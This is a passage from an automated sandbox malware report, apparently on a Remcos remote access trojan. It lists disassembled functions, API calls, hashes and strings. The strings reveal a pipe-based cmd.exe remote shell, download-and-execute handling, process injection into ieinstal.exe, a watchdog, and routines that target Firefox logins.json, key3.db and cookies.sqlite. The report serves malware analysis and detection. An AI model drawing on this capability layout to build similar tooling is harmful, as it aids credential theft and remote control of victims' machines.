                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenQueryValue
                              • String ID:
                              • API String ID: 3677997916-0
                              • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                              • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                              • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                              • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
                              Function 00409517 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: _wcslen
                              • String ID: xAG
                              • API String ID: 176396367-2759412365
                              • Opcode ID: 67b639f6f502bf991f83ab0ee8fabe8b44a35461e942d099586b23cecd669b62
                              • Instruction ID: 4b5f0267b16b6d1f94f05398eea60063c36f9fdec9e789d07f1c8464d26cb595
                              • Opcode Fuzzy Hash: 67b639f6f502bf991f83ab0ee8fabe8b44a35461e942d099586b23cecd669b62
                              • Instruction Fuzzy Hash: 751193325002049FCB15FF66D8968EF7BA4EF64314B10453FF842622E2EF38A955CB98
                              Function 0044B9BE Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • _free.LIBCMT ref: 0044B9DF
                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                              • RtlReAllocateHeap.NTDLL(00000000,00475D30,?,00000004,00000000,?,0044E90A,00475D30,00000004,?,00475D30,?,?,00443125,00475D30,?), ref: 0044BA1B
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeap$_free
                              • String ID:
                              • API String ID: 1482568997-0
                              • Opcode ID: d76ce5d9e4c682b15a99abc110236e8d1a2fbccdd24d1d48a07619e1950cdef4
                              • Instruction ID: 12956794463f81a5c067cbc08b9f94d22fea268b9007f3edb04f63306941b305
                              • Opcode Fuzzy Hash: d76ce5d9e4c682b15a99abc110236e8d1a2fbccdd24d1d48a07619e1950cdef4
                              • Instruction Fuzzy Hash: D6F0F67210051167FF212A27AC01B6B2B2CDFC27B1F15012BFA18AA292DF6CCC0191EE
                              Function 004041F1 Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                              Download Yara Rule
                              APIs
                              • socket.WS2_32(?,00000001,00000006), ref: 00404212
                                • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateEventStartupsocket
                              • String ID:
                              • API String ID: 1953588214-0
                              • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                              • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                              • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                              • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
                              Function 00446AFF Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: 9bddc84dc8664baa6f7cbd2250fb2f50dd1e52b915d866c7822d6cfd0d1e4f3c
                              • Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
                              • Opcode Fuzzy Hash: 9bddc84dc8664baa6f7cbd2250fb2f50dd1e52b915d866c7822d6cfd0d1e4f3c
                              • Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF
                              Function 00404262 Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                              Download Yara Rule
                              APIs
                              • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Startup
                              • String ID:
                              • API String ID: 724789610-0
                              • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                              • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                              • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                              • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                              Function 0042610E Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: send
                              • String ID:
                              • API String ID: 2809346765-0
                              • Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                              • Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
                              • Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                              • Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36

                              Non-executed Functions

                              Function 00406F06 Relevance: 48.1, APIs: 10, Strings: 17, Instructions: 849filesleepCOMMON
                              Download Yara Rule
                              APIs
                              • SetEvent.KERNEL32(?,?), ref: 00406F28
                              • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                              • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                              • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                              • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                              • DeleteFileA.KERNEL32(?), ref: 004078CC
                                • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                              • Sleep.KERNEL32(000007D0), ref: 00407976
                              • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                              • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$TTF$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                              • API String ID: 2918587301-184849705
                              • Opcode ID: 27224f2a7aa186132a712ae4b6ae46411a5a00ddb7b924fe6b973b313c533f43
                              • Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
                              • Opcode Fuzzy Hash: 27224f2a7aa186132a712ae4b6ae46411a5a00ddb7b924fe6b973b313c533f43
                              • Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
                              Function 00405042 Relevance: 38.8, APIs: 15, Strings: 7, Instructions: 280pipesleepfileCOMMON
                              Download Yara Rule
                              APIs
                              • __Init_thread_footer.LIBCMT ref: 0040508E
                                • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                              • __Init_thread_footer.LIBCMT ref: 004050CB
                              • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                              • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                              • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                              • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                              • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                              • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                              • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                              • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                              • CloseHandle.KERNEL32 ref: 004053CD
                              • CloseHandle.KERNEL32 ref: 004053D5
                              • CloseHandle.KERNEL32 ref: 004053E7
                              • CloseHandle.KERNEL32 ref: 004053EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                              • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                              • API String ID: 3815868655-81343324
                              • Opcode ID: 7b7c0b6b0b1bc352b2ea071c9c26875d1ca54d1275fb18312e3ec054a3f2afea
                              • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                              • Opcode Fuzzy Hash: 7b7c0b6b0b1bc352b2ea071c9c26875d1ca54d1275fb18312e3ec054a3f2afea
                              • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                              Function 00410F36 Relevance: 35.2, APIs: 7, Strings: 13, Instructions: 238threadCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                • Part of subcall function 004127D5: RegCloseKey.KERNELBASE(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                              • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                              • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                • Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                • Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500
                              • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                              • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                              • String ID: 0DG$Remcos restarted by watchdog!$TTF$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                              • API String ID: 65172268-329858390
                              • Opcode ID: 40df72cc02995369b7805ca6c014cc284e8c00477eaf270d4f083364b9d516c5
                              • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                              • Opcode Fuzzy Hash: 40df72cc02995369b7805ca6c014cc284e8c00477eaf270d4f083364b9d516c5
                              • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                              Function 0040B335 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 145fileCOMMON
                              Download Yara Rule
                              APIs
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                              • FindClose.KERNEL32(00000000), ref: 0040B3CE
                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                              • FindClose.KERNEL32(00000000), ref: 0040B517
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$CloseFile$FirstNext
                              • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                              • API String ID: 1164774033-3681987949
                              • Opcode ID: 8a573f4cde42bb8974b55a1bb9849f05b01946ec243df485f40a07b19650f4e4
                              • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                              • Opcode Fuzzy Hash: 8a573f4cde42bb8974b55a1bb9849f05b01946ec243df485f40a07b19650f4e4
                              • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                              Function 0040B53A Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 130fileCOMMON
                              Download Yara Rule
                              APIs
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                              • FindClose.KERNEL32(00000000), ref: 0040B5CC
                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                              • FindClose.KERNEL32(00000000), ref: 0040B6B2
                              • FindClose.KERNEL32(00000000), ref: 0040B6D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$Close$File$FirstNext
                              • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                              • API String ID: 3527384056-432212279
                              • Opcode ID: e3298efea2014f122d9e4da4ca7a52805c3aaa742dc7125d16785d6f153ddc68
                              • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                              • Opcode Fuzzy Hash: e3298efea2014f122d9e4da4ca7a52805c3aaa742dc7125d16785d6f153ddc68
                              • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                              Function 0040E219 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 212processCOMMON
                              Download Yara Rule
                              APIs
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                              • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                • Part of subcall function 004127D5: RegCloseKey.KERNELBASE(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                              • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                              • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                              • API String ID: 726551946-3025026198
                              • Opcode ID: 5829e150cee290297d3b2fa5b4d652fb26d49642f3ffce9c75a7d7dcd293438e
                              • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                              • Opcode Fuzzy Hash: 5829e150cee290297d3b2fa5b4d652fb26d49642f3ffce9c75a7d7dcd293438e
                              • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                              Function 004159C6 Relevance: 18.1, APIs: 12, Instructions: 80clipboardmemoryCOMMON
                              Download Yara Rule
                              APIs
